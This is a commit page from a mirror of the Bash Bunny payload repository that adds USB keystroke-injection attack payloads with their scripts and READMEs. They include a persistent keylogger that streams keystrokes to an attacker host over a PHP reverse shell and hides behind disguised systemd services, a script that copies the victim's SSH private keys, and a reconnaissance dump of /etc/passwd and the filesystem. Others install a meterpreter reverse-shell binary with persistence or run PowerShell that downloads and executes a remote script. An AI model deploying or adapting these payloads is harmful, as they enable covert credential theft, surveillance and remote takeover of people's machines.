hak5/bashbunny-payloads
1
0
Fork 0
mirror of https://github.com/hak5/bashbunny-payloads.git synced 2025-10-29 16:58:25 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'hak5:master' into master

Browse Source
This commit is contained in:
0iphor13
2022-03-14 12:08:11 +01:00
committed by GitHub
parent 09ab811f9c 2e297ba861
commit bc281bcfdc
23 changed files with 1170 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

62
payloads/library/credentials/BunnyLogger/README.md Normal file
View File

@@ -0,0 +1,62 @@
## About:
* Title: BunnyLogger
* Description: Key logger which sends each and every key stroke of target remotely/locally.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Credentials
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## BunnyLogger: BunnyLogger is a Key Logger which captures every key stroke of traget and send them to attacker.
### Features:
* Live keystroke capturing.
* Detailed key logs.
* Persistent
* Autostart payload on boot.
### Workflow:
* Encoding payload and injecting on target's system.
* Checks whether internet is connected to the target system.
* If internet is connected then it sends raw keystrokes to attacker.
* Attacker processes raw keystrokes.
### Changes to be made in payload.sh:
* Replace ip(0.0.0.0) and port number(4444) with your servers ip address and port number on line no `11`.
* Increase/Decrease time interval to restart service periodically (Default is 15 mins), on line no `15`.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| xinput | /tools/ |
### Usage:
1. Encode payload.txt and inject into target's system.
2. Start netcat listner on attacking system:
* `nc -lvp <port number> > <log filename>` use this command to create new logfile with raw keystrokes.
* `nc -lvp <port number> >> <log filename>` use this command to append raw keystrokes to existing logfile.
3. Process raw keystrokes using BunnyLoggerDecoder utility:
```
./bunnyLoggerDecoder
bunnyLoggerDecoder is used to decode raw key strokes acquired by bunnyLogger.
Usage:
Decode captured log: [./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]
Options:
-f Specify Log file.
-m Select Mode(normal|informative)
-o Specify Output file.
-h For this banner.
```
#### Support me if you like my work:
* https://twitter.com/drapl0n

50
payloads/library/credentials/BunnyLogger/bunnyLoggerDecoder Normal file
View File

@@ -0,0 +1,50 @@
usage () {
echo -e "BunnyLoggerDecoder is used to decode raw key strokes acquired by BunnyLogger.\n"
echo -e "Usage: \nDecode captured log:\t[./bunnyLoggerDecoder -f <Logfile> -m <mode> -o <output file>]";
echo -e "\nOptions:"
echo -e "-f\tSpecify Log file."
echo -e "-m\tSelect Mode(normal|informative)"
echo -e "-o\tSpecify Output file."
echo -e "-h\tFor this banner."
}
while getopts o:m:f:h: flag
do
case "${flag}" in
o) output=$OPTARG ;;
m) mode=$OPTARG ;;
f) filename=$OPTARG ;;
h) help=$OPTARG ;;
*)
usage
exit 1
esac
done
if [ -z "$output" ] && [ -z "$filename" ]; then
usage
exit 1
fi
if [ -z "$filename" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-f\"(Log file not specified).\nUse \"-h\" for more information." >&2
exit 1
fi
if [ -z "$output" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-o\"(Output file not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ -z "$mode" ]; then
echo -e "BunnyLoggerDecoder: Missing option \"-m\"(Mode not specified).\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" != "informative" ] && [ "$mode" != "normal" ]; then
echo -e "BunnyLoggerDecoder: Invalid mode \"$mode\".\nUse \"-h\" for help." >&2
exit 1
fi
if [ "$mode" == "normal" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename | grep press | awk '{print $4}' > $output
exit 1
fi
if [ "$mode" == "informative" ] ; then
awk 'BEGIN{while (("xmodmap -pke" | getline) > 0) k[$2]=$4} {print $0 "[" k [$NF] "]"}' $filename > $output
exit 1
fi

24
payloads/library/credentials/BunnyLogger/payload.sh Normal file
View File

@@ -0,0 +1,24 @@
#!/bin/bash
unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
mkdir /var/tmp/.system
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
cp -r $mntt/tools/xinput /var/tmp/.system/
echo "/var/tmp/.system/./xinput list | grep -Po 'id=\K\d+(?=.*slave\s*keyboard)' | xargs -P0 -n1 /var/tmp/.system/./xinput test" > /var/tmp/.system/sys
chmod +x /var/tmp/.system/sys
chmod +x /var/tmp/.system/xinput
echo -e "while :\ndo\n\tping -c 5 0.0.0.0\n\tif [ $? -eq 0 ]; then\n\t\tphp -r '\$sock=fsockopen(\"0.0.0.0\",4444);exec("\"/var/tmp/.system/sys -i "<&3 >&3 2>&3"\"");'\n\tfi\ndone" > /var/tmp/.system/systemBus
chmod +x /var/tmp/.system/systemBus
mkdir -p ~/.config/systemd/user
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
echo "while true; do systemctl --user restart systemBUS.service; sleep 15m; done" > /var/tmp/.system/reboot
chmod +x /var/tmp/.system/reboot
echo -e "[Unit]\nDescription= System BUS handler reboot.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/reboot -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/reboot.service
systemctl --user daemon-reload
systemctl --user enable --now systemBUS.service
systemctl --user start --now systemBUS.service
systemctl --user enable --now reboot.service
systemctl --user start --now reboot.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now reboot.service && systemctl --user enable --now systemBUS.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/credentials/BunnyLogger/payload.txt Normal file
View File

@@ -0,0 +1,56 @@
# Title: BunnyLogger
# Description: Key logger which sends each and every key stroke of target remotely/locally.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 2000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

BIN
payloads/library/credentials/BunnyLogger/xinput Normal file
View File

Binary file not shown.

49
payloads/library/credentials/sshDump/payload.txt Normal file
View File

@@ -0,0 +1,49 @@
# Title: sshDump
# Description: Taking advantage of plain stored ssh private keys in home dir, sshDump grabs them for you.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Credentials
# Target: GNU/Linux.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [Looting]
Q STRING cp -r '~/.ssh' '$mntt/loot/SSH'
Q ENTER
Q DELAY 2000
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

24
payloads/library/exfiltration/intel/README.md Normal file
View File

@@ -0,0 +1,24 @@
# intel(intelligence)
## About:
* Title: intel
* Description: intel(intelligence) payload collects detailed information of victims machine.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Exfiltration
* Target: GNU/Linux
* Attackmodes: HID, Storage
## intel(intelligence) payload collects detailed information of victims machine.
### Workflow:
1. Prevent storing history.
2. Fetching BashBunny's block device.
3. Mounting BashBunny.
4. Transfering payload script and executing it.
5. Deleting script from victims system.
6. Unmounting BashBunny.
#### Support me if you like my work:
* https://twitter.com/drapl0n

67
payloads/library/exfiltration/intel/intel.sh Normal file
View File

@@ -0,0 +1,67 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Schema:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
nmap -sV localhost >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Network Interfaces:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
ifconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
ip addr >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
iwconfig >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo Storage Info: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
findmnt >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/fstab >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "USB Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lsusb -v >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "PCI Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lspci -vvv >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "CPU Info:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
lscpu >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Systemd services:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
systemctl list-units >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo User/groups: >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
id >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
cat /etc/passwd >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
echo "Installed packages:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
pacman -Q >> $mntt/loot/intel || apt list --installed >> $mntt/loot/intel || dpkg -l >> $mntt/loot/intel || apk info >> $mntt/loot/intel || yum list installed >> $mntt/loot/intel || dnf list installed >> $mntt/loot/intel || zypper se --installed-only >> $mntt/loot/intel || rpm -qa >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
snap list >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
flatpak list --app >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel
echo "Directory Structure:" >> $mntt/loot/intel
echo -e "*******************************************" >> $mntt/loot/intel
find * / >> $mntt/loot/intel
echo -e "\n" >> $mntt/loot/intel
echo -e "******************************************" >> $mntt/loot/intel

56
payloads/library/exfiltration/intel/payload.txt Normal file
View File

@@ -0,0 +1,56 @@
# Title: intel
# Description: intel(intelligence) payload collects detailed information of victims machine.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Exfiltration
# Target: GNU/Linux operating systems.
# Attackmodes: HID, Storage.
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/intel.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/intel.sh
Q ENTER
Q STRING /tmp/./intel.sh
Q ENTER
Q DELAY 25000
Q STRING rm /tmp/intel.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH

2
payloads/library/poc/MacOS_EICAR/eicar.sh Normal file
View File

@@ -0,0 +1,2 @@
#!/bin/bash
echo 'X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*'\ >Desktop/Malware.txt

32
payloads/library/poc/MacOS_EICAR/payload.txt Normal file
View File

@@ -0,0 +1,32 @@
#!/bin/bash
# Title: MacOS_EICAR
# Description: Bad USB PoC for MacOS.
# Author: Ciph3rtxt
# Category: PoC
# Target: MacOS
# Attackmodes: HID STORAGE
# Setup
LED R
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
path=/Volumes/BashBunny/payloads/$SWITCH_POSITION
# Execute Attack
LED R
DELAY 200
RUN OSX terminal
Q DELAY 2000
Q STRING cd
Q ENTER
Q DELAY 200
Q STRING chmod a+x $path/eicar.sh
Q ENTER
Q DELAY 200
Q STRING $path/eicar.sh
Q ENTER
Q DELAY 200
# Complete
LED G

19
payloads/library/poc/MacOS_EICAR/readme.md Normal file
View File

@@ -0,0 +1,19 @@
# MacOS EICAR PoC
Author: Ciph3rtxt
## Category:
PoC
## Description:
Generates EICAR file to simulate USB (physical access) malware attack.
## Status:
|LED|STATUS|
|-|-|
|Red|Attack|
|Green|Complete|

2
payloads/library/prank/UnifiedRickRoll/payload.txt
View File

@@ -13,7 +13,7 @@ Q DELAY 1000
Q GUI n
Q DELAY 1000
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while test \$hi == \'0\'\; do if [ \$ho == $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
Q STRING hi=0\; ho=\$\(date \'+%H%M\'\)\; while [ \$hi = \'0\' ]\; do if [ \$ho = $time ]\; then osascript -e \"set Volume 9\" \&\& open \"https://www.youtube.com/watch?v=dQw4w9WgXcQ\" \; hi=1\; fi\; ho=\$\(date \'+%H%M\'\)\; sleep 1\; done \& disown
# close up shop
Q DELAY 1000

37
payloads/library/prank/Win_PoSh_HiThere/payload.txt Normal file
View File

@@ -0,0 +1,37 @@
#!/bin/bash
# Title: Hi There
# Description: Creates a hidden link file that override the ctrl+c functionality.
# So, when the user press ctrl+c it lunches the first sign-in animation.
# Author: Cribbit
# Version: 1.0
# Category: Pranks
# Target: Windows (Powershell 5.1+)
# Attackmodes: RNDIS_ETHERNET HID
# Props: v3ded, Hexacorn and Audibleblink (Python Server)
LED SETUP
ATTACKMODE RNDIS_ETHERNET HID
GET SWITCH_POSITION
GET HOST_IP
cd /root/udisk/payloads/$SWITCH_POSITION/
# starting server
LED SPECIAL
# disallow outgoing dns requests so server starts immediately
iptables -A OUTPUT -p udp --dport 53 -j DROP
python -m SimpleHTTPServer 80 &
# wait until port is listening
while ! nc -z localhost 80; do sleep 0.2; done
# attack commences
LED ATTACK
QUACK DELAY 200
RUN WIN "powershell -Noni -NoP -W h -EP Bypass -C \"iex (New-Object Net.WebClient).DownloadString('http://$HOST_IP/s')\""
QUACK DELAY 500
QUACK CTRL c
LED FINISH

33
payloads/library/prank/Win_PoSh_HiThere/readme.md Normal file
View File

@@ -0,0 +1,33 @@
# Hi There
- Author: Cribbit
- Version: 1.0
- Tested on: Windows 10 (Powershell 5.1+)
- Category: Pranks
- Attackmode: HID & RNDIS_ETHERNET
- Extensions: Run
- Props: v3ded, Hexacorn and Audibleblink (Python Server)
## Change Log
| Version | Changes |
| ------- | --------------- |
| 1.0 | Initial release |
## Description
Creates a hidden link file that override the ctrl+c functionality.
So, when the user press ctrl+c it lunches the first sign-in animation.
## Notes
to kill the animation, you need to open task manger and look for "First Sign-in Animation".
For extra evilness add `/explorer` to the `$shortcut.Arguments` line in the script file. Then you can't switch programs or kill it.
## More information
<https://v3ded.github.io/redteam/abusing-lnk-features-for-initial-access-and-persistence>
<https://www.hexacorn.com/blog/2022/01/16/windows-installation-animation/>
## Colours
| Status | Colour | Description |
| -------- | ----------------------------- | --------------------------- |
| SETUP | Magenta solid | Setting attack mode |
| ATTACK | Yellow single blink | Injecting Powershell script |
| FINISHED | Green blink followed by SOLID | Injection finished |

19
payloads/library/prank/Win_PoSh_HiThere/s Normal file
View File

@@ -0,0 +1,19 @@
$path = "$([Environment]::GetFolderPath('Desktop'))\readme.lnk"
$wshell = New-Object -ComObject Wscript.Shell
$shortcut = $wshell.CreateShortcut($path)
$shortcut.IconLocation = "C:\Windows\System32\shell32.dll,70"
$shortcut.TargetPath = "C:\Windows\System32\oobe\FirstLogonAnim.exe"
$shortcut.Arguments = "/RunFirstLogonAnim"
$shortcut.WorkingDirectory = "C:"
$shortcut.HotKey = "CTRL+C"
$shortcut.Description = "Contain very important information"
$shortcut.WindowStyle = 7
# 7 = Minimized window
# 3 = Maximized window
# 1 = Normal window
$shortcut.Save()
(Get-Item $path).Attributes += 'Hidden' # Optional if we want to make the link invisible (prevent user clicks)

36
payloads/library/remote_access/LinuxPreter/README.md Normal file
View File

@@ -0,0 +1,36 @@
## About:
* Title: LinuxPreter
* Description: Injects meterpreter payload and makes it persistent.
* AUTHOR: drapl0n
* Version: 1.0
* Category: Remote Access
* Target: Unix-like operating systems with systemd.
* Attackmodes: HID, Storage
## LinuxPreter injects meterpreter payload, make it persistent and triggers payload on launch of terminal/shell.
### Workflow:
* Keeping tracks clear by preventing storage of history.
* Fetching BashBunny's block device and mounting it.
* Transfering payload script and payload itself.
* Deleting scripts from victims machine and unmounting bunny.
### Create Meterpreter payload:
* ```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP ADDRESS> LPORT=<PORT NO> -f elf -o sysHandle.bin```
* NOTE: Only change IP address and Port number in the above command.
### LED Status:
* `SETUP` : MAGENTA
* `ATTACK` : YELLOW
* `FINISH` : GREEN
### Directory Structure of payload components:
| FileName | Directory |
| -------------- | ----------------------------- |
| payload.txt | /payload/switch1/ |
| payload.sh | /payload/ |
| sysHandle.bin | /tools/ |
#### Support me if you like my work:
* https://twitter.com/drapl0n

12
payloads/library/remote_access/LinuxPreter/payload.sh Normal file
View File

@@ -0,0 +1,12 @@
lol=$(lsblk | grep 1.8G)
disk=$(echo $lol | awk '{print $1}')
mntt=$(lsblk | grep $disk | awk '{print $7}')
mkdir /var/tmp/.system
cp -r $mntt/tools/sysHandle.bin /var/tmp/.system
chmod +x /var/tmp/.system/sysHandle.bin
mkdir -p ~/.config/systemd/user/
systemctl --user start systemPer.service
echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/var/tmp/.system/./sysHandle.bin -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemPer.service
echo -e "ls -a | grep 'zshrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service \" >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ \$? = 0 ]; then\n\techo \"systemctl --user enable --now systemPer.service\" >> ~/.bashrc\nfi" > ~/tmmmp
chmod +x ~/tmmmp && cd ~/ && ./tmmmp && rm tmmmp && exit

56
payloads/library/remote_access/LinuxPreter/payload.txt Normal file
View File

@@ -0,0 +1,56 @@
# Title: LinuxPreter
# Description: Injects meterpreter payload and makes it persistent.
# AUTHOR: drapl0n
# Version: 1.0
# Category: Remote Access
# Target: Unix-like operating systems with systemd.
# Attackmodes: HID, Storage
LED SETUP
ATTACKMODE STORAGE HID
GET SWITCH_POSITION
LED ATTACK
Q DELAY 1000
Q CTRL-ALT t
Q DELAY 1000
# [Prevent storing history]
Q STRING unset HISTFILE
Q ENTER
Q DELAY 200
# [Fetching BashBunny's block device]
Q STRING lol='$(lsblk | grep 1.8G)'
Q ENTER
Q DELAY 100
Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
Q ENTER
Q DELAY 200
# [Mounting BashBunny]
Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
Q ENTER
Q DELAY 2000
Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
Q ENTER
Q DELAY 500
# [transfering payload script]
Q STRING cp -r '$mntt'/payloads/payload.sh /tmp/
Q ENTER
Q STRING chmod +x /tmp/payload.sh
Q ENTER
Q STRING /tmp/./payload.sh
Q ENTER
Q DELAY 1000
Q STRING rm /tmp/payload.sh
Q ENTER
Q DELAY 500
# [Unmounting BashBunny]
Q STRING udisksctl unmount -b /dev/'$disk'
Q ENTER
Q DELAY 500
Q STRING exit
Q ENTER
LED FINISH